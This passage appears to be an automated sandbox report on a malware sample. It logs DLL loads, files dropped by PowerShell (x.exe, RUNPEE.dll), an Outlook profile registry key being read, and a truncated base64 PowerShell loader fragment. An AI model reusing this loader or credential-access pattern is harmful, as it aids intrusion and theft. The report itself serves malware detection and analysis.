                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: CZG3HF22.pdbH source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                      Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

                      Data Obfuscation

                      barindex
                      Found suspicious powershell code related to unpacking or dynamic code loading
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
                      Source: x.exe.0.drStatic PE information: 0xB41A313D [Thu Oct 1 09:37:01 2065 UTC]
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_053C13CD push ebx; iretd 0_2_053C13DA
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_053C5228 push esp; iretd 0_2_053C5241
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_08402C97 push esi; iretd 4_2_08402CEC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_084027B4 push esp; ret 4_2_084027B7
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01889D22 push esp; ret 4_2_01889D23
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEA088 pushad ; retf 0004h5_2_00BEA0EA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE9089 push ebx; retf 0004h5_2_00BE908A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BEA0E8 pushad ; retf 0004h5_2_00BEA0EA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE8490 push edx; retf 0004h5_2_00BE8EEA
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE8481 push ecx; retf 0004h5_2_00BE8482
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE9468 push esi; retf A804h5_2_00BE961A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE9459 push esi; retf 0004h5_2_00BE945A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE9611 push edi; retf 0004h5_2_00BE9612
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00BE9DE0 pushad ; retf 0004h5_2_00BEA02A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
